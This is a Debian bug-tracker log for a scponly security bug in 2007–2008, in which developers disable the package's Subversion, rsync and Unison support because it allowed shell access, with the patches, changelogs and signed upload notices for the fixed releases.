Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Thomas Wana <greuff@debian.org>:
Extra info received and forwarded to list. Full text and rfc822 format available.

Message #107 received at 437148@bugs.debian.org (full text, mbox):

From: Thomas Wana <greuff@debian.org>
To: Joachim Breitner <nomeata@debian.org>, 437148@bugs.debian.org
Subject: Re: Bug#437148: [scponly] svn support in scponly is unsafe
Date: Sun, 9 Sep 2007 16:04:22 +0200
On 07.09.2007, at 11:01, Joachim Breitner wrote:

> Hi,
>
> Am Freitag, den 07.09.2007, 10:59 +0200 schrieb Florian Weimer:
>> * Joachim Breitner:
>>>> I think mounting the file system no-exec covers that.  IIRC,
>>>> Subversion directly executes the hook scripts, and this will  
>>>> fail in
>>>> that case.
>>>
>>> Then this should be mentioned in the file. I also think that this is
>>> quite a high hurdle: Admins that want that can surely re-compile
>>> scponly.
>>
>> It's mentioned in the file (item 7), but I agree that this is not the
>> target group of the Debian package.
>
> Sorry, didn’t read it all.
>
>>> For the rest, the debian package should come without svn
>>> support. The README.Debian could describe the disabled features, and
>>> under what circumstances they are save, and how best to recompile
>>> scponly.
>>
>> The package could create two binaries, one that supports just
>> scp/sftp, and another one for the rest.
>
> Sounds good, but that’s up to the maintainer. Thomas, are you reading
> this?

I am, I'm doing an overhaul of the package soon.

Tom

>
>> For the stable security update, it's probably best to just disable
>> Subversion/Unison/rsync.
>
> I agree.
>
> Greetings,
> Joachim
>
> -- 
> Joachim "nomeata" Breitner
> Debian Developer
>   nomeata@debian.org | ICQ# 74513189 | GPG-Keyid: 4743206C
>   JID: joachimbreitner@amessage.de | http://people.debian.org/~nomeata
>
>





Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #112 received at 437148@bugs.debian.org (full text, mbox):

From: Steffen Joeris <steffen.joeris@skolelinux.de>
To: 437148@bugs.debian.org
Subject: scponly: deactivating or splitting packages
Date: Mon, 24 Sep 2007 23:41:13 +1000
[Message part 1 (text/plain, inline)]
Hi

I was just wondering about the status of this security bug.
Shall we go ahead and deactivate the svn support via NMU and you can decide 
what to do later or do you likely have the time to do the splitting?
Thanks for your feedback.

Cheers
Steffen
[signature.asc (application/pgp-signature, inline)]

Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Steffen Joeris <steffen.joeris@skolelinux.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #117 received at 437148@bugs.debian.org (full text, mbox):

From: Steffen Joeris <steffen.joeris@skolelinux.de>
To: 437148@bugs.debian.org
Subject: NMU fix
Date: Tue, 25 Sep 2007 20:33:39 +1000
[Message part 1 (text/plain, inline)]
Hi

Below you will find the NMU patch. The issue should be out for sid now and the 
package should migrate to testing shortly.
Feel free to keep working on the package split though.

Cheers
Steffen

diff -u scponly-4.6/debian/changelog scponly-4.6/debian/changelog
--- scponly-4.6/debian/changelog
+++ scponly-4.6/debian/changelog
@@ -1,3 +1,14 @@
+scponly (4.6-1.1) unstable; urgency=high
+
+  * Non-maintainer upload by the testing-security team
+  * Disable unison, rsync and svn usability, because all three could be
+    exploited. (Closes: #437148)
+   - The maintainer is working on splitting the packages and providing
+     a binary package, which enables these features, but warns about
+     them and one, which is safe and has them disabled, like this
+
+ -- Steffen Joeris <white@debian.org>  Tue, 25 Sep 2007 10:06:31 +0000
+
 scponly (4.6-1) unstable; urgency=high

   * New upstream version 4.6. (Closes: #342701, #324918)
diff -u scponly-4.6/debian/rules scponly-4.6/debian/rules
--- scponly-4.6/debian/rules
+++ scponly-4.6/debian/rules
@@ -26,7 +26,7 @@
 config.status: configure
        dh_testdir
        # Add here commands to configure the package.
-       ./configure 
CFLAGS='$(CFLAGS)' --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --sysconfdir=\$${prefix}/../etc --enable-scp-compat --enable-winscp-compat --enable-rsync-compat --enable-unison-compat --enable-chrooted-binary --enable-passwd-compat --enable-svn-compat 
PROG_USERADD=/usr/sbin/useradd
+       ./configure 
CFLAGS='$(CFLAGS)' --host=$(DEB_HOST_GNU_TYPE) --build=$(DEB_BUILD_GNU_TYPE) --prefix=/usr --mandir=\$${prefix}/share/man --infodir=\$${prefix}/share/info --sysconfdir=\$${prefix}/../etc --enable-scp-compat --enable-winscp-compat --enable-chrooted-binary --enable-passwd-compat 
PROG_USERADD=/usr/sbin/useradd


 build: build-stamp
[signature.asc (application/pgp-signature, inline)]

Reply sent to Steffen Joeris <white@debian.org>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #122 received at 437148-close@bugs.debian.org (full text, mbox):

From: Steffen Joeris <white@debian.org>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.6-1.1
Date: Tue, 25 Sep 2007 10:32:03 +0000
Source: scponly
Source-Version: 4.6-1.1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1.1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1.1.diff.gz
scponly_4.6-1.1.dsc
  to pool/main/s/scponly/scponly_4.6-1.1.dsc
scponly_4.6-1.1_i386.deb
  to pool/main/s/scponly/scponly_4.6-1.1_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Steffen Joeris <white@debian.org> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 25 Sep 2007 10:06:31 +0000
Source: scponly
Binary: scponly
Architecture: source i386
Version: 4.6-1.1
Distribution: unstable
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Steffen Joeris <white@debian.org>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1.1) unstable; urgency=high
 .
   * Non-maintainer upload by the testing-security team
   * Disable unison, rsync and svn usability, because all three could be
     exploited. (Closes: #437148)
    - The maintainer is working on splitting the packages and providing
      a binary package, which enables these features, but warns about
      them and one, which is safe and has them disabled, like this
Files: 
 cbc36940db279059d177f6fcef59ecec 592 utils optional scponly_4.6-1.1.dsc
 e5c1efbf4f95143271b5259d6a3765f2 28435 utils optional scponly_4.6-1.1.diff.gz
 f8e48b6b8bb8066570ce13eec06647a7 33012 utils optional scponly_4.6-1.1_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFG+OKK62zWxYk/rQcRAs3JAJsEcXcVgHSn2YQXjkdRnwZq0zk2DACgqtLr
QPFLwPP1jhLEjtQLfqDAnjA=
=ePCh
-----END PGP SIGNATURE-----





Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to "Tatsuo Sekine" <sekine.t@gmail.com>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #127 received at 437148@bugs.debian.org (full text, mbox):

From: "Tatsuo Sekine" <sekine.t@gmail.com>
To: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Tue, 25 Dec 2007 11:26:25 +0900
Now rsync, unison and subversion are not supported.
So those should be removed from build dependency.

--- scponly-4.6-1.1/debian/control      2007-12-25 11:21:34.000000000 +0900
+++ scponly/debian/control      2007-12-25 11:23:01.000000000 +0900
@@ -2,7 +2,7 @@
 Section: utils
 Priority: optional
 Maintainer: Thomas Wana <greuff@debian.org>
-Build-Depends: debhelper (>= 4.1.16), rsync, ssh, unison, subversion
+Build-Depends: debhelper (>= 4.1.16), ssh
 Standards-Version: 3.6.1.0

 Package: scponly

-- 
Tatsuo Sekine




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #132 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: "Tatsuo Sekine" <sekine.t@gmail.com>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Tue, 25 Dec 2007 16:01:07 +0100
* Tatsuo Sekine:

> Now rsync, unison and subversion are not supported.
> So those should be removed from build dependency.
>
> --- scponly-4.6-1.1/debian/control      2007-12-25 11:21:34.000000000 +0900
> +++ scponly/debian/control      2007-12-25 11:23:01.000000000 +0900
> @@ -2,7 +2,7 @@
>  Section: utils
>  Priority: optional
>  Maintainer: Thomas Wana <greuff@debian.org>
> -Build-Depends: debhelper (>= 4.1.16), rsync, ssh, unison, subversion
> +Build-Depends: debhelper (>= 4.1.16), ssh

Is the SSH dependency really necessary?




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to "Tatsuo Sekine" <sekine.t@gmail.com>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #137 received at 437148@bugs.debian.org (full text, mbox):

From: "Tatsuo Sekine" <sekine.t@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Wed, 26 Dec 2007 10:03:29 +0900
Configure script tries to detect sftp-server and scp binary location.

All of binaries which will be run via scponly should be listed with
their full path, because of restricting executables.

On Dec 26, 2007 12:01 AM, Florian Weimer <fw@deneb.enyo.de> wrote:
> * Tatsuo Sekine:
>
> > Now rsync, unison and subversion are not supported.
> > So those should be removed from build dependency.
> >
> > --- scponly-4.6-1.1/debian/control      2007-12-25 11:21:34.000000000 +0900
> > +++ scponly/debian/control      2007-12-25 11:23:01.000000000 +0900
> > @@ -2,7 +2,7 @@
> >  Section: utils
> >  Priority: optional
> >  Maintainer: Thomas Wana <greuff@debian.org>
> > -Build-Depends: debhelper (>= 4.1.16), rsync, ssh, unison, subversion
> > +Build-Depends: debhelper (>= 4.1.16), ssh
>
> Is the SSH dependency really necessary?
>



-- 
Tatsuo Sekine




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to Florian Weimer <fw@deneb.enyo.de>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #142 received at 437148@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: "Tatsuo Sekine" <sekine.t@gmail.com>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Wed, 26 Dec 2007 07:54:13 +0100
* Tatsuo Sekine:

> Configure script tries to detect sftp-server and scp binary location.

Ah, then a dependency on openssh-client is sufficient (ssh is
essentially openssh-server).




Information forwarded to debian-bugs-dist@lists.debian.org, Thomas Wana <greuff@debian.org>:
Bug#437148; Package scponly. Full text and rfc822 format available.

Acknowledgement sent to "Tatsuo Sekine" <sekine.t@gmail.com>:
Extra info received and forwarded to list. Copy sent to Thomas Wana <greuff@debian.org>. Full text and rfc822 format available.

Message #147 received at 437148@bugs.debian.org (full text, mbox):

From: "Tatsuo Sekine" <sekine.t@gmail.com>
To: "Florian Weimer" <fw@deneb.enyo.de>
Cc: 437148@bugs.debian.org
Subject: Re: Bug#437148: fixed in scponly 4.6-1.1
Date: Wed, 26 Dec 2007 16:53:18 +0900
sftp-server is in openssh-server package and scp is in openssh-client package.
So, both sever and client package should be listed in build dependency.

On Dec 26, 2007 3:54 PM, Florian Weimer <fw@deneb.enyo.de> wrote:
> * Tatsuo Sekine:
>
> > Configure script tries to detect sftp-server and scp binary location.
>
> Ah, then a dependency on openssh-client is sufficient (ssh is
> essentially openssh-server).

-- 
Tatsuo Sekine




Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #152 received at 437148-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.6-1etch1
Date: Wed, 23 Jan 2008 19:52:12 +0000
Source: scponly
Source-Version: 4.6-1etch1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1etch1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1etch1.diff.gz
scponly_4.6-1etch1.dsc
  to pool/main/s/scponly/scponly_4.6-1etch1.dsc
scponly_4.6-1etch1_amd64.deb
  to pool/main/s/scponly/scponly_4.6-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 25 Dec 2007 14:11:00 +0100
Source: scponly
Binary: scponly
Architecture: source amd64
Version: 4.6-1etch1
Distribution: stable-security
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1etch1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 c02dfefb7289fcb09e9ac83d7cf78655 890 utils optional scponly_4.6-1etch1.dsc
 0425cb868cadd026851238452f1db907 96578 utils optional scponly_4.6.orig.tar.gz
 a588cb9138820d73f16bc81ffc4f8e20 28528 utils optional scponly_4.6-1etch1.diff.gz
 2bb425113107e4e471c15685333f1a0a 34214 utils optional scponly_4.6-1etch1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR3EI5797/wQC1SS+AQLsYAf9FvSLLurAKk42qCXJgjysHinC0iLsKpZp
aTVAxPCInbqg7IwX5Rf28gXogQ3OROStMZfduyjxaRXUxnLkgD+pTS/aYKbIueEo
LvL2bhHJFyQQuxqZ3wOBLvHndRWAwdsuNWxnpQPDgxWVDzw3jVINp50bk25aVMV8
OMkNxhcJUWjhr71TRv7A1aNfn70z8lnZGTjyBMkqr9MEqiJ2vYr7TPbyhONBqmad
8g6IJj1oJ3aq5wRuoZ88Klwze6kWXfb7TdN6I4grDVZ8JRoBb/AhX5tyXVHo5mZ1
NcgLb/XCLJpLtgI0Lh6/8qErvqE+d5FOYqEKtNLXzng12iPiw4YoNQ==
=eP3R
-----END PGP SIGNATURE-----





Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #157 received at 437148-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.0-1sarge2
Date: Mon, 28 Jan 2008 19:52:18 +0000
Source: scponly
Source-Version: 4.0-1sarge2

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.0-1sarge2.diff.gz
  to pool/main/s/scponly/scponly_4.0-1sarge2.diff.gz
scponly_4.0-1sarge2.dsc
  to pool/main/s/scponly/scponly_4.0-1sarge2.dsc
scponly_4.0-1sarge2_i386.deb
  to pool/main/s/scponly/scponly_4.0-1sarge2_i386.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 25 Dec 2007 13:27:52 +0100
Source: scponly
Binary: scponly
Architecture: source i386
Version: 4.0-1sarge2
Distribution: oldstable-security
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.0-1sarge2) oldstable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 f37d3236975bdb6742eba5ac788c40c2 892 utils optional scponly_4.0-1sarge2.dsc
 380ea78eb602749989c8031a4f916c79 27490 utils optional scponly_4.0-1sarge2.diff.gz
 62413a011d04721bb4b6f9a3d9496e27 29322 utils optional scponly_4.0-1sarge2_i386.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR3EI5L97/wQC1SS+AQIcOgf6AzLvBGObNrYFKRLbZXuC3l5TPr2wiw03
mlwAbDAyvjsb84lsJz69H9u2wmmr0RWHr+JIepkKA5ewoH0on9SCskdjOVDd6cBV
xMS3n0qnUIK7bXsZmxIyYg61neDHLalVlkShPu4+reYEbevE6CLU2p0n+L3esyLn
fbDdWJae/29Pdt3G+xhZHyx0ruPmEkoQI3X96ar4qA7JGVJdQsl9gjLfJH4hY2Ii
RrRzYaIaJVqJfN3eBw8bsVGW2NW9uMya97a9pzyE7Y5uqZO59SwxJl9jdRYGiCbP
J4Y4brNlIyFx0bouwFL+Y4qNVP+aHX0N8hxaux99RRqvdbEHJY1OXw==
=mZhF
-----END PGP SIGNATURE-----





Reply sent to Florian Weimer <fw@deneb.enyo.de>:
You have taken responsibility. Full text and rfc822 format available.

Notification sent to Joachim Breitner <nomeata@debian.org>:
Bug acknowledged by developer. Full text and rfc822 format available.

Message #162 received at 437148-close@bugs.debian.org (full text, mbox):

From: Florian Weimer <fw@deneb.enyo.de>
To: 437148-close@bugs.debian.org
Subject: Bug#437148: fixed in scponly 4.6-1etch1
Date: Sat, 16 Feb 2008 12:17:28 +0000
Source: scponly
Source-Version: 4.6-1etch1

We believe that the bug you reported is fixed in the latest version of
scponly, which is due to be installed in the Debian FTP archive:

scponly_4.6-1etch1.diff.gz
  to pool/main/s/scponly/scponly_4.6-1etch1.diff.gz
scponly_4.6-1etch1.dsc
  to pool/main/s/scponly/scponly_4.6-1etch1.dsc
scponly_4.6-1etch1_amd64.deb
  to pool/main/s/scponly/scponly_4.6-1etch1_amd64.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 437148@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Florian Weimer <fw@deneb.enyo.de> (supplier of updated scponly package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Tue, 25 Dec 2007 14:11:00 +0100
Source: scponly
Binary: scponly
Architecture: source amd64
Version: 4.6-1etch1
Distribution: stable-security
Urgency: high
Maintainer: Thomas Wana <greuff@debian.org>
Changed-By: Florian Weimer <fw@deneb.enyo.de>
Description: 
 scponly    - Restricts the commands available to scp- and sftp-users
Closes: 437148
Changes: 
 scponly (4.6-1etch1) stable-security; urgency=high
 .
   * Non-maintainer upload by the Security Team
   * Remove rsync, Subversion and Unison support because it was possible
     to gain shell access through them (CVE-2007-6350).  Closes: #437148.
   * scp: -o and -F options are dangerous (CVE-2007-6415).
Files: 
 c02dfefb7289fcb09e9ac83d7cf78655 890 utils optional scponly_4.6-1etch1.dsc
 0425cb868cadd026851238452f1db907 96578 utils optional scponly_4.6.orig.tar.gz
 a588cb9138820d73f16bc81ffc4f8e20 28528 utils optional scponly_4.6-1etch1.diff.gz
 2bb425113107e4e471c15685333f1a0a 34214 utils optional scponly_4.6-1etch1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iQEVAwUBR3EI5797/wQC1SS+AQLsYAf9FvSLLurAKk42qCXJgjysHinC0iLsKpZp
aTVAxPCInbqg7IwX5Rf28gXogQ3OROStMZfduyjxaRXUxnLkgD+pTS/aYKbIueEo
LvL2bhHJFyQQuxqZ3wOBLvHndRWAwdsuNWxnpQPDgxWVDzw3jVINp50bk25aVMV8
OMkNxhcJUWjhr71TRv7A1aNfn70z8lnZGTjyBMkqr9MEqiJ2vYr7TPbyhONBqmad
8g6IJj1oJ3aq5wRuoZ88Klwze6kWXfb7TdN6I4grDVZ8JRoBb/AhX5tyXVHo5mZ1
NcgLb/XCLJpLtgI0Lh6/8qErvqE+d5FOYqEKtNLXzng12iPiw4YoNQ==
=eP3R
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 16 Mar 2008 07:30:59 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Apr 16 14:05:41 2014; Machine Name: buxtehude.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.